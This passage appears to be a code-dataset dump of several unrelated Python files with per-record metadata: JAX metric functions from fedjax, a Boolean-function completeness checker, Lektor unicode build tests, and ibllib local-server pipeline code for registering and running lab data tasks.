  """Computes proportion of non masked tokens that are out of vocabulary.

  Args:
    targets: Target values of shape [batch_size, sequence_length, ...].
    oov_values: Target values denoting out of vocabulary values. A token is
      out of vocabulary if it matches ANY one of these values.
    mask_values: Target values to be masked and not counted in metric.

  Returns:
    Metric for out of vocabulary rate.
  """
  weights = jnp.ones_like(targets, dtype=jnp.float32)
  for mv in mask_values:
    weights *= (targets != mv)
  num_non_masked = jnp.sum(weights)
  # BUGFIX: the previous code multiplied the per-value equality masks
  # together, so with more than one oov value no token could ever count as
  # OOV (a token cannot equal two different values). OR the masks instead;
  # behavior is unchanged for the single-oov-value case.
  is_oov = jnp.zeros_like(targets, dtype=jnp.float32)
  for ov in oov_values:
    is_oov = jnp.maximum(is_oov, (targets == ov).astype(jnp.float32))
  num_oov = jnp.sum(weights * is_oov)
  return MeanMetric(total=num_oov, count=num_non_masked)
def sequence_length(targets: jnp.ndarray, pad_value: int) -> MeanMetric:
  """Computes length of sequence examples by number of non-pad tokens."""
  # Mean length over sequences that contain at least one non-pad token.
  is_token = targets != pad_value
  lengths = jnp.sum(is_token, axis=1)
  has_tokens = jnp.any(is_token, axis=1)
  return MeanMetric(total=jnp.sum(lengths), count=jnp.sum(has_tokens))
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metrics."""
import abc
import numbers
from typing import Any, Optional, Tuple
from fedjax.legacy.core import dataclasses
import jax
import jax.numpy as jnp
# Small constant to add to denominator to avoid division by 0.
_SAFE_DIVIDE = 1e-10
class Metric(metaclass=abc.ABCMeta):
"""Interface for all metric containers (e.g. accuracy).
`Metric` stores intermediate values as well as methods for accumulation and
final result computation.
"""
@abc.abstractmethod
def merge(self, other: 'Metric') -> 'Metric':
"""Merges `self` and `other` into a new single accumulated metric."""
@abc.abstractmethod
def result(self) -> jnp.ndarray:
"""Computes final metric result from intermediate values."""
def __str__(self) -> str:
"""Returns human readable string representation of metric."""
return f'{repr(self)} => {self.result()}'
def _is_scalar(x):
if isinstance(x, jnp.ndarray):
return x.ndim == 0
return isinstance(x, numbers.Number)
@dataclasses.dataclass
class MeanMetric(Metric):
"""Implementation for metrics that are reduced by averaging (total / count).
Attributes:
total: Scalar sum of intermediate values.
count: Scalar number of intermediate values.
"""
total: jnp.ndarray
count: jnp.ndarray
def __post_init__(self):
if not (_is_scalar(self.total) and _is_scalar(self.count)):
raise TypeError('total and count must both be scalars.')
@classmethod
def from_values(cls,
values: jnp.ndarray,
weights: Optional[jnp.ndarray] = None) -> 'MeanMetric':
"""Constructs MeanMetric from intermediate values and optional weights.
Args:
values: Array of intermediate values.
weights: Array of weights for each intermediate value of the same shape as
values. Defaults to unweighted.
Returns:
MeanMetric for (possibly weighted) average of values.
"""
if weights is None:
weights = jnp.ones_like(values)
return cls(total=jnp.sum(values * weights), count=jnp.sum(weights))
def merge(self, other: 'MeanMetric') -> 'MeanMetric':
return type(self)(
total=self.total + other.total, count=self.count + other.count)
def result(self) -> jnp.ndarray:
return self.total / jnp.maximum(self.count, _SAFE_DIVIDE)
@dataclasses.dataclass
class CountMetric(Metric):
"""Implementation for counter metrics (e.g. num_out_of_vocabulary_words)."""
count: jnp.ndarray
def __post_init__(self):
if not _is_scalar(self.count):
raise TypeError('count must be a scalar.')
def merge(self, other: 'CountMetric') -> 'CountMetric':
return type(self)(count=self.count + other.count)
def result(self) -> jnp.ndarray:
return self.count
def _unreduced_cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> jnp.ndarray:
"""Returns unreduced cross entropy loss."""
num_classes = preds.shape[-1]
log_preds = jax.nn.log_softmax(preds)
one_hot_targets = jax.nn.one_hot(targets, num_classes)
return -jnp.sum(one_hot_targets * log_preds, axis=-1)
def cross_entropy_loss_fn(targets: jnp.ndarray,
preds: jnp.ndarray) -> MeanMetric:
"""Computes cross entropy loss.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
Returns:
Metric for loss.
"""
unreduced_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
return MeanMetric.from_values(unreduced_loss)
def masked_cross_entropy_loss_fn(
targets: jnp.ndarray, preds: jnp.ndarray,
mask_values: Tuple[int, ...] = ()) -> MeanMetric:
"""Computes cross entropy loss after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
mask_values: Target values to be masked and not counted in loss.
Returns:
Metric for masked loss.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
unreduced_loss = _unreduced_cross_entropy_loss_fn(targets, preds)
return MeanMetric.from_values(unreduced_loss, weights=weights)
def accuracy_fn(targets: jnp.ndarray, preds: jnp.ndarray) -> MeanMetric:
"""Computes accuracy.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
Returns:
Metric for accuracy.
"""
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets)
def masked_accuracy_fn(
targets: jnp.ndarray,
preds: jnp.ndarray,
mask_values: Tuple[int, ...] = (),) -> MeanMetric:
"""Computes accuracy after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
mask_values: Target values to be masked and not counted in accuracy.
Returns:
Metric for masked accuracy.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets, weights=weights)
def masked_accuracy_fn_with_logits_mask(
targets: jnp.ndarray,
preds: jnp.ndarray,
logits_mask: jnp.ndarray,
mask_values: Tuple[int, ...] = (),
) -> MeanMetric:
"""Computes accuracy after discounting masked values.
Args:
targets: Target values of shape [batch_size, ...] in range [0, num_classes).
preds: Unnormalized model output of shape [batch_size, ..., num_classes].
logits_mask: Mask of shape [num_classes] to be applied for preds.
mask_values: Target values to be masked and not counted in accuracy.
Returns:
Metric for masked accuracy with logits mask.
"""
weights = jnp.ones_like(targets, dtype=preds.dtype)
for mv in mask_values:
weights *= (targets != mv)
preds = preds + logits_mask
pred_class = jnp.argmax(preds, axis=-1)
return MeanMetric.from_values(pred_class == targets, weights=weights)
def masked_count(targets: jnp.ndarray,
mask_values: Tuple[Any, ...] = ()) -> CountMetric:
"""Counts total number of non masked targets."""
weights = jnp.ones_like(targets, dtype=jnp.int32)
for mv in mask_values:
weights *= (targets != mv)
return CountMetric(count=jnp.sum(weights))
def truncation_rate(targets: jnp.ndarray,
eos_value: int,
pad_value: int) -> MeanMetric:
"""Computes the proportion of sequence examples that were truncated.
Args:
targets: Target values of shape [batch_size, sequence_length, ...].
eos_value: Target value denoting end of sequence. Truncated sequences will
not have this value.
pad_value: Optional target value for padding to discount empty sequences.
Returns:
Metric for trucation rate.
"""
not_empty = jnp.any(targets != pad_value, axis=1)
is_truncated = jnp.all(targets != eos_value, axis=1) * not_empty
return MeanMetric(total=jnp.sum(is_truncated), count=jnp.sum(not_empty))
def oov_rate(
targets: jnp.ndarray,
oov_values: Tuple[int, ...],
mask_values: Tuple[int, ...] = ()) -> MeanMetric:
"""Computes proportion of non masked tokens that are out of vocabulary.
Args:
targets: Target values of shape [batch_size, sequence_length, ...].
oov_values: Target values denoting out of vocabulary values.
mask_values: Target values to be masked and not counted in metric.
Returns:
Metric for out of vocabulary rate.
"""
weights = jnp.ones_like(targets, dtype=jnp.float32)
for mv in mask_values:
weights *= (targets != mv)
num_non_masked = jnp.sum(weights)
for ov in oov_values:
weights *= (targets == ov)
num_oov = jnp.sum(weights)
return MeanMetric(total=num_oov, count=num_non_masked)
def sequence_length(targets: jnp.ndarray, pad_value: int) -> MeanMetric:
"""Computes length of sequence examples by number of non-pad tokens."""
non_pad_mask = targets != pad_value
not_empty = jnp.any(non_pad_mask, axis=1)
num_non_pad = jnp.sum(non_pad_mask, axis=1)
return MeanMetric(total=jnp.sum(num_non_pad), count=jnp.sum(not_empty))
|
en
| 0.810994
|
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Metrics. # Small constant to add to denominator to avoid division by 0. Interface for all metric containers (e.g. accuracy). `Metric` stores intermediate values as well as methods for accumulation and final result computation. Merges `self` and `other` into a new single accumulated metric. Computes final metric result from intermediate values. Returns human readable string representation of metric. Implementation for metrics that are reduced by averaging (total / count). Attributes: total: Scalar sum of intermediate values. count: Scalar number of intermediate values. Constructs MeanMetric from intermediate values and optional weights. Args: values: Array of intermediate values. weights: Array of weights for each intermediate value of the same shape as values. Defaults to unweighted. Returns: MeanMetric for (possibly weighted) average of values. Implementation for counter metrics (e.g. num_out_of_vocabulary_words). Returns unreduced cross entropy loss. Computes cross entropy loss. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. Returns: Metric for loss. Computes cross entropy loss after discounting masked values. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. 
mask_values: Target values to be masked and not counted in loss. Returns: Metric for masked loss. Computes accuracy. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. Returns: Metric for accuracy. Computes accuracy after discounting masked values. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. mask_values: Target values to be masked and not counted in accuracy. Returns: Metric for masked accuracy. Computes accuracy after discounting masked values. Args: targets: Target values of shape [batch_size, ...] in range [0, num_classes). preds: Unnormalized model output of shape [batch_size, ..., num_classes]. logits_mask: Mask of shape [num_classes] to be applied for preds. mask_values: Target values to be masked and not counted in accuracy. Returns: Metric for masked accuracy with logits mask. Counts total number of non masked targets. Computes the proportion of sequence examples that were truncated. Args: targets: Target values of shape [batch_size, sequence_length, ...]. eos_value: Target value denoting end of sequence. Truncated sequences will not have this value. pad_value: Optional target value for padding to discount empty sequences. Returns: Metric for trucation rate. Computes proportion of non masked tokens that are out of vocabulary. Args: targets: Target values of shape [batch_size, sequence_length, ...]. oov_values: Target values denoting out of vocabulary values. mask_values: Target values to be masked and not counted in metric. Returns: Metric for out of vocabulary rate. Computes length of sequence examples by number of non-pad tokens.
| 2.453875
| 2
|
Diskret/1stLab/task3.py
|
ShuffleZZZ/ITMO
| 11
|
6628060
|
def save1(c):
    """Return 1 if the truth table `c` preserves one (f(1,..,1) == '1')."""
    # The all-ones input corresponds to the last truth-table entry.
    return 1 if c[-1] == '1' else 0
def save0(c):
    """Return 1 if the truth table `c` preserves zero (f(0,..,0) == '0')."""
    # The all-zeros input corresponds to the first truth-table entry.
    return 1 if c[0] == '0' else 0
def dv(c, n):
    """Return 1 if the n-ary truth table `c` is self-dual, else 0.

    A function is self-dual when f(x) != f(~x) for every input, i.e. the
    table disagrees with its own reversal at every position.
    """
    if n == 0:
        # Constant functions can never be self-dual here.
        return 0
    half = 2 ** (n - 1)
    for i in range(half):
        if c[i] == c[-i - 1]:
            return 0
    return 1
def mono(c, n):
    """Return 1 if the n-ary truth table `c` is monotone, else 0.

    Recursively splits the table on the first variable: the lower half
    (variable = 0) must be pointwise <= the upper half (variable = 1),
    and both halves must themselves be monotone.
    """
    if n == 0:
        return 1
    half = 2 ** (n - 1)
    lo, hi = c[:half], c[half:]
    if any(a == '1' and b == '0' for a, b in zip(lo, hi)):
        return 0
    return mono(lo, n - 1) and mono(hi, n - 1)
def line(c, n):
    """Return 1 if the n-ary truth table `c` is linear (affine), else 0.

    Computes the ANF (Zhegalkin polynomial) coefficients via the in-place
    triangle transform mod 2; the function is linear iff every nonzero
    coefficient sits at index 0 or a power of two (single-variable term).
    """
    coeffs = list(map(int, c))
    size = 2 ** n
    for step in range(1, size):
        for j in range(size - 1, step - 1, -1):
            coeffs[j] = (coeffs[j] + coeffs[j - 1]) % 2
    # Indices of the constant and single-variable terms; covers n <= 6,
    # presumably matching the task's input bounds — TODO confirm.
    allowed = {0, 1, 2, 4, 8, 16, 32}
    for idx in range(size):
        if coeffs[idx] == 1 and idx not in allowed:
            return 0
    return 1
# Read the number of functions, then one "<arity> <truth-table>" line each.
n =int(input())
arr=list()
for i in range(n):
    arr.append(input().split())
    arr[i][0]=int(arr[i][0])
# k1..k5 flag, for each of the five closed classes (1-preserving,
# 0-preserving, self-dual, monotone, linear), whether at least one
# function falls OUTSIDE that class — this appears to implement Post's
# completeness criterion for a system of boolean functions.
k1=0
k2=0
k3=0
k4=0
k5=0
for i in range(n):
    if (save1(arr[i][1])==0):
        k1=1
    if (save0(arr[i][1])==0):
        k2=1
    if (dv(arr[i][1],arr[i][0])==0):
        k3=1
    if (mono(arr[i][1],arr[i][0])==0):
        k4=1
    if (line(arr[i][1],arr[i][0])==0):
        k5=1
# Complete iff every class is escaped by some function.
if (k1==k2==k3==k4==k5==1):
    print('YES')
else:
    print('NO')
|
# NOTE(review): byte-identical duplicate of the script above (the dataset dump
# stores each file twice). Checks functional completeness of a set of Boolean
# functions via Post's criterion.
def save1(c):
    # f preserves 1 iff the last truth-table entry (all-ones input) is '1'.
    if (c[-1]=='1'):
        return 1
    return 0
def save0(c):
    # f preserves 0 iff the first truth-table entry (all-zeros input) is '0'.
    if (c[0]=='0'):
        return 1
    return 0
def dv(c, n):
    # Self-duality: f(x) must differ from f(~x) for every input x.
    if (n==0):
        return 0
    for i in range(2**(n-1)):
        if (c[i]==c[-i-1]):
            return 0
    return 1
def mono(c,n):
    # Monotonicity, checked recursively on the two half-tables.
    if n==0:
        return 1
    l = c[:2**(n-1)]
    r = c[2**(n-1):]
    for i in range(2**(n-1)):
        if (l[i]=='1' and r[i]=='0'):
            return 0
    return mono(l,n-1) and mono(r,n-1)
def line(c, n):
    # Linearity via the triangle (Zhegalkin/ANF) transform.
    tr = list(map(int,c))
    for i in range(1,2**n):
        for j in range(2**n-1,i-1,-1):
            tr[j] =(tr[j]+tr[j-1])%2
    # NOTE(review): this list only covers powers of two up to 32, i.e. n <= 6.
    st=[0,1,2,4,8,16,32]
    for i in range(2**n):
        if tr[i]==1 and not i in st:
            return 0
    return 1
n =int(input())
arr=list()
for i in range(n):
    arr.append(input().split())
    arr[i][0]=int(arr[i][0])
k1=0
k2=0
k3=0
k4=0
k5=0
for i in range(n):
    if (save1(arr[i][1])==0):
        k1=1
    if (save0(arr[i][1])==0):
        k2=1
    if (dv(arr[i][1],arr[i][0])==0):
        k3=1
    if (mono(arr[i][1],arr[i][0])==0):
        k4=1
    if (line(arr[i][1],arr[i][0])==0):
        k5=1
if (k1==k2==k3==k4==k5==1):
    print('YES')
else:
    print('NO')
|
none
| 1
| 2.983406
| 3
|
|
tests/test_unicode.py
|
arabidopsis/lektor
| 0
|
6628061
|
# coding: utf-8
import os
from lektor.build_programs import BuildError
from lektor.builder import Builder
from lektor.db import Database
from lektor.environment import Environment
from lektor.project import Project
from lektor.reporter import BufferReporter
def get_unicode_builder(tmpdir):
    """Open the bundled project whose path contains non-ASCII characters and
    return its database pad plus a Builder writing into *tmpdir*/output."""
    proj = Project.from_path(
        os.path.join(os.path.dirname(__file__), u"ünicöde-project")
    )
    env = Environment(proj)
    pad = Database(env).new_pad()
    return pad, Builder(pad, str(tmpdir.mkdir("output")))
def test_unicode_project_folder(tmpdir):
    """Building from a unicode project folder yields UTF-8 encoded output."""
    pad, builder = get_unicode_builder(tmpdir)
    prog, _ = builder.build(pad.root)
    with prog.artifacts[0].open("rb") as f:
        assert f.read() == b"<h1>Hello</h1>\n<p>W\xc3\xb6rld</p>\n\n"
def test_unicode_attachment_filename(tmpdir):
    """An attachment with a unicode filename builds without any failure."""
    pad, builder = get_unicode_builder(tmpdir)
    with BufferReporter(builder.env) as reporter:
        prog, _ = builder.build(pad.root.attachments.first())
    # pylint: disable=no-member
    failures = reporter.get_failures()
    assert len(failures) == 0
    with prog.artifacts[0].open("rb") as f:
        assert f.read().rstrip() == b"attachment"
def test_bad_file_ignored(tmpdir):
    """A record whose URL is non-ASCII is reported as exactly one BuildError."""
    pad, builder = get_unicode_builder(tmpdir)
    record = pad.root.children.first()
    with BufferReporter(builder.env) as reporter:
        prog, _ = builder.build(record)
    # pylint: disable=no-member
    failures = reporter.get_failures()
    assert len(failures) == 1
    exc_info = failures[0]["exc_info"]
    assert exc_info[0] is BuildError
    assert (
        "The URL for this record contains non "
        "ASCII characters" in exc_info[1].message
    )
|
# coding: utf-8
import os
from lektor.build_programs import BuildError
from lektor.builder import Builder
from lektor.db import Database
from lektor.environment import Environment
from lektor.project import Project
from lektor.reporter import BufferReporter
# NOTE(review): byte-identical duplicate of the unicode test module above
# (the dataset dump stores each file twice); see the annotated first copy.
def get_unicode_builder(tmpdir):
    proj = Project.from_path(
        os.path.join(os.path.dirname(__file__), u"ünicöde-project")
    )
    env = Environment(proj)
    pad = Database(env).new_pad()
    return pad, Builder(pad, str(tmpdir.mkdir("output")))
def test_unicode_project_folder(tmpdir):
    pad, builder = get_unicode_builder(tmpdir)
    prog, _ = builder.build(pad.root)
    with prog.artifacts[0].open("rb") as f:
        assert f.read() == b"<h1>Hello</h1>\n<p>W\xc3\xb6rld</p>\n\n"
def test_unicode_attachment_filename(tmpdir):
    pad, builder = get_unicode_builder(tmpdir)
    with BufferReporter(builder.env) as reporter:
        prog, _ = builder.build(pad.root.attachments.first())
    # pylint: disable=no-member
    failures = reporter.get_failures()
    assert len(failures) == 0
    with prog.artifacts[0].open("rb") as f:
        assert f.read().rstrip() == b"attachment"
def test_bad_file_ignored(tmpdir):
    pad, builder = get_unicode_builder(tmpdir)
    record = pad.root.children.first()
    with BufferReporter(builder.env) as reporter:
        prog, _ = builder.build(record)
    # pylint: disable=no-member
    failures = reporter.get_failures()
    assert len(failures) == 1
    exc_info = failures[0]["exc_info"]
    assert exc_info[0] is BuildError
    assert (
        "The URL for this record contains non "
        "ASCII characters" in exc_info[1].message
    )
|
en
| 0.63398
|
# coding: utf-8 # pylint: disable=no-member # pylint: disable=no-member
| 2.035479
| 2
|
ibllib/pipes/local_server.py
|
hanhou/ibllib
| 0
|
6628062
|
import logging
from datetime import datetime
from pathlib import Path
import pkg_resources
import re
import subprocess
import sys
import traceback
from ibllib.io.extractors.base import get_session_extractor_type, get_pipeline
from ibllib.pipes import ephys_preprocessing, training_preprocessing, tasks
from ibllib.time import date2isostr
import oneibl.registration as registration
from oneibl.one import ONE
_logger = logging.getLogger('ibllib')
def _get_lab(one):
    """Return the list of Alyx lab name(s) whose data repository matches this
    machine's Globus endpoint id; implicitly returns None when none match."""
    # The local Globus endpoint id identifies which lab(s) this server serves.
    with open(Path.home().joinpath(".globusonline/lta/client-id.txt"), 'r') as fid:
        globus_id = fid.read()
    lab = one.alyx.rest('labs', 'list', django=f"repositories__globus_endpoint_id,{globus_id}")
    if len(lab):
        return [la['name'] for la in lab]
def _run_command(cmd):
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
info, error = process.communicate()
if process.returncode != 0:
return None
else:
return info.decode('utf-8').strip()
def _get_volume_usage(vol, label=''):
    """Return usage statistics for the filesystem holding *vol*, parsed from
    ``df`` output, with every key prefixed by *label*.

    NOTE(review): assumes ``df`` succeeds -- if _run_command returns None this
    raises AttributeError. df reports 1-KiB blocks, so dividing by 1024**2
    presumably yields GiB -- confirm the intended unit.
    """
    cmd = f'df {vol}'
    res = _run_command(cmd)
    # size_list = ['/dev/sdc1', '1921802500', '1427128132', '494657984', '75%', '/datadisk']
    size_list = re.split(' +', res.split('\n')[-1])
    fac = 1024 ** 2
    d = {'total': int(size_list[1]) / fac,
         'used': int(size_list[2]) / fac,
         'available': int(size_list[3]) / fac,
         'volume': size_list[5]}
    # Prefix every key so several volumes can share one status dictionary.
    return {f"{label}_{k}": d[k] for k in d}
def report_health(one):
    """
    Get a few indicators and label the json field of the corresponding lab with them
    """
    # Software versions, local time, and disk usage of data and system volumes.
    status = {'python_version': sys.version,
              'ibllib_version': pkg_resources.get_distribution("ibllib").version,
              'phylib_version': pkg_resources.get_distribution("phylib").version,
              'local_time': date2isostr(datetime.now())}
    status.update(_get_volume_usage('/mnt/s0/Data', 'raid'))
    status.update(_get_volume_usage('/', 'system'))
    # NOTE(review): _get_lab may return None, which would raise TypeError here.
    lab_names = _get_lab(one)
    for ln in lab_names:
        one.alyx.json_field_update(endpoint='labs', uuid=ln, field_name='json', data=status)
def job_creator(root_path, one=None, dry=False, rerun=False, max_md5_size=None):
    """
    Server function that will look for creation flags and for each:
    1) create the sessions on Alyx
    2) register the corresponding raw data files on Alyx
    3) create the tasks to be run on Alyx
    :param root_path: main path containing sessions or session path
    :param one: ONE instance (created on the fly when None)
    :param dry: when True only log the sessions, do not register anything
    :param rerun: when True recreate tasks whatever their current status
    :param max_md5_size: files larger than this are registered without checksum
    :return: list of registered dataset dictionaries
    """
    if not one:
        one = ONE()
    rc = registration.RegistrationClient(one=one)
    flag_files = list(Path(root_path).glob('**/raw_session.flag'))
    all_datasets = []
    for flag_file in flag_files:
        session_path = flag_file.parent
        _logger.info(f'creating session for {session_path}')
        if dry:
            continue
        try:
            # if the subject doesn't exist in the database, skip
            rc.create_session(session_path)
            files, dsets = registration.register_session_raw_data(
                session_path, one=one, max_md5_size=max_md5_size)
            if dsets is not None:
                all_datasets.extend(dsets)
            pipeline = get_pipeline(session_path)
            if pipeline == 'training':
                pipe = training_preprocessing.TrainingExtractionPipeline(session_path, one=one)
            # only start extracting ephys on a raw_session.flag
            elif pipeline == 'ephys' and flag_file.name == 'raw_session.flag':
                pipe = ephys_preprocessing.EphysExtractionPipeline(session_path, one=one)
            else:
                # Fixed log message: the adjacent f-strings were missing a space
                # and the "h", producing "Session type Xas no matching pipeline".
                _logger.info(f"Session type {get_session_extractor_type(session_path)} "
                             f"has no matching pipeline pattern {session_path}")
                continue
            if rerun:
                rerun__status__in = '__all__'
            else:
                rerun__status__in = ['Waiting']
            pipe.create_alyx_tasks(rerun__status__in=rerun__status__in)
            flag_file.unlink()
        except BaseException:
            # One broken session must never kill the server loop: log the full
            # traceback and move on to the next flag file.
            _logger.error(traceback.format_exc())
            _logger.warning(f"Creating session / registering raw datasets {session_path} errored")
            continue
    return all_datasets
def job_runner(subjects_path, lab=None, dry=False, one=None, count=5):
    """
    Function to be used as a process to run the jobs as they are created on the database
    This will query waiting jobs from the specified Lab
    :param subjects_path: on servers: /mnt/s0/Data/Subjects. Contains sessions
    :param lab: lab name as per Alyx (looked up from the Globus id when None)
    :param dry: when True only print what would run
    :param one: ONE instance (created on the fly when None)
    :param count: maximum number of tasks to run in one call
    :return:
    """
    if one is None:
        one = ONE()
    if lab is None:
        lab = _get_lab(one)
    if lab is None:
        return # if the lab is none, this will return empty tasks each time
    # Pick up only tasks still waiting to be run for this lab's sessions.
    tasks = one.alyx.rest('tasks', 'list', status='Waiting',
                          django=f'session__lab__name__in,{lab}')
    tasks_runner(subjects_path, tasks, one=one, count=count, time_out=3600, dry=dry)
def tasks_runner(subjects_path, tasks_dict, one=None, dry=False, count=5, time_out=None, **kwargs):
    """
    Function to run a list of tasks (task dictionary from Alyx query) on a local server
    :param subjects_path: root folder containing the subject/session tree
    :param tasks_dict: list of task dictionaries as returned by the Alyx REST query
    :param one: ONE instance (created on the fly when None)
    :param dry: when True only print what would run
    :param count: maximum number of tasks to run
    :param time_out: between each task, if time elapsed is greater than time out, returns (seconds)
    :param kwargs: forwarded to tasks.run_alyx_task
    :return: list of dataset dictionaries
    """
    if one is None:
        one = ONE()
    import time
    tstart = time.time()
    c = 0
    last_session = None
    all_datasets = []
    for tdict in tasks_dict:
        # if the count is reached or if the time_out has been elapsed, break the loop and return
        if c >= count or (time_out and time.time() - tstart > time_out):
            break
        # reconstruct the session local path. As many jobs belong to the same session
        # cache the result
        if last_session != tdict['session']:
            ses = one.alyx.rest('sessions', 'list', django=f"pk,{tdict['session']}")[0]
            session_path = Path(subjects_path).joinpath(
                Path(ses['subject'], ses['start_time'][:10], str(ses['number']).zfill(3)))
            last_session = tdict['session']
        if dry:
            print(session_path, tdict['name'])
        else:
            task, dsets = tasks.run_alyx_task(tdict=tdict, session_path=session_path,
                                              one=one, **kwargs)
            if dsets:
                all_datasets.extend(dsets)
            # Only non-dry executions count towards the *count* budget.
            c += 1
    return all_datasets
|
# NOTE(review): byte-identical duplicate of the local_server module above
# (the dataset dump stores each file twice); see the annotated first copy
# for detailed documentation.
import logging
from datetime import datetime
from pathlib import Path
import pkg_resources
import re
import subprocess
import sys
import traceback
from ibllib.io.extractors.base import get_session_extractor_type, get_pipeline
from ibllib.pipes import ephys_preprocessing, training_preprocessing, tasks
from ibllib.time import date2isostr
import oneibl.registration as registration
from oneibl.one import ONE
_logger = logging.getLogger('ibllib')
def _get_lab(one):
    with open(Path.home().joinpath(".globusonline/lta/client-id.txt"), 'r') as fid:
        globus_id = fid.read()
    lab = one.alyx.rest('labs', 'list', django=f"repositories__globus_endpoint_id,{globus_id}")
    if len(lab):
        return [la['name'] for la in lab]
def _run_command(cmd):
    process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    info, error = process.communicate()
    if process.returncode != 0:
        return None
    else:
        return info.decode('utf-8').strip()
def _get_volume_usage(vol, label=''):
    cmd = f'df {vol}'
    res = _run_command(cmd)
    # size_list = ['/dev/sdc1', '1921802500', '1427128132', '494657984', '75%', '/datadisk']
    size_list = re.split(' +', res.split('\n')[-1])
    fac = 1024 ** 2
    d = {'total': int(size_list[1]) / fac,
         'used': int(size_list[2]) / fac,
         'available': int(size_list[3]) / fac,
         'volume': size_list[5]}
    return {f"{label}_{k}": d[k] for k in d}
def report_health(one):
    """
    Get a few indicators and label the json field of the corresponding lab with them
    """
    status = {'python_version': sys.version,
              'ibllib_version': pkg_resources.get_distribution("ibllib").version,
              'phylib_version': pkg_resources.get_distribution("phylib").version,
              'local_time': date2isostr(datetime.now())}
    status.update(_get_volume_usage('/mnt/s0/Data', 'raid'))
    status.update(_get_volume_usage('/', 'system'))
    lab_names = _get_lab(one)
    for ln in lab_names:
        one.alyx.json_field_update(endpoint='labs', uuid=ln, field_name='json', data=status)
def job_creator(root_path, one=None, dry=False, rerun=False, max_md5_size=None):
    """
    Server function that will look for creation flags and for each:
    1) create the sessions on Alyx
    2) register the corresponding raw data files on Alyx
    3) create the tasks to be run on Alyx
    :param root_path: main path containing sessions or session path
    :param one
    :param dry
    :param rerun
    :param max_md5_size
    :return:
    """
    if not one:
        one = ONE()
    rc = registration.RegistrationClient(one=one)
    flag_files = list(Path(root_path).glob('**/raw_session.flag'))
    all_datasets = []
    for flag_file in flag_files:
        session_path = flag_file.parent
        _logger.info(f'creating session for {session_path}')
        if dry:
            continue
        try:
            # if the subject doesn't exist in the database, skip
            rc.create_session(session_path)
            files, dsets = registration.register_session_raw_data(
                session_path, one=one, max_md5_size=max_md5_size)
            if dsets is not None:
                all_datasets.extend(dsets)
            pipeline = get_pipeline(session_path)
            if pipeline == 'training':
                pipe = training_preprocessing.TrainingExtractionPipeline(session_path, one=one)
            # only start extracting ephys on a raw_session.flag
            elif pipeline == 'ephys' and flag_file.name == 'raw_session.flag':
                pipe = ephys_preprocessing.EphysExtractionPipeline(session_path, one=one)
            else:
                _logger.info(f"Session type {get_session_extractor_type(session_path)}"
                             f"as no matching pipeline pattern {session_path}")
                continue
            if rerun:
                rerun__status__in = '__all__'
            else:
                rerun__status__in = ['Waiting']
            pipe.create_alyx_tasks(rerun__status__in=rerun__status__in)
            flag_file.unlink()
        except BaseException:
            _logger.error(traceback.format_exc())
            _logger.warning(f"Creating session / registering raw datasets {session_path} errored")
            continue
    return all_datasets
def job_runner(subjects_path, lab=None, dry=False, one=None, count=5):
    """
    Function to be used as a process to run the jobs as they are created on the database
    THis will query waiting jobs from the specified Lab
    :param subjects_path: on servers: /mnt/s0/Data/Subjects. Contains sessions
    :param lab: lab name as per Alyx
    :param dry:
    :param count:
    :return:
    """
    if one is None:
        one = ONE()
    if lab is None:
        lab = _get_lab(one)
    if lab is None:
        return # if the lab is none, this will return empty tasks each time
    tasks = one.alyx.rest('tasks', 'list', status='Waiting',
                          django=f'session__lab__name__in,{lab}')
    tasks_runner(subjects_path, tasks, one=one, count=count, time_out=3600, dry=dry)
def tasks_runner(subjects_path, tasks_dict, one=None, dry=False, count=5, time_out=None, **kwargs):
    """
    Function to run a list of tasks (task dictionary from Alyx query) on a local server
    :param subjects_path:
    :param tasks_dict:
    :param one:
    :param dry:
    :param count: maximum number of tasks to run
    :param time_out: between each task, if time elapsed is greater than time out, returns (seconds)
    :param kwargs:
    :return: list of dataset dictionaries
    """
    if one is None:
        one = ONE()
    import time
    tstart = time.time()
    c = 0
    last_session = None
    all_datasets = []
    for tdict in tasks_dict:
        # if the count is reached or if the time_out has been elapsed, break the loop and return
        if c >= count or (time_out and time.time() - tstart > time_out):
            break
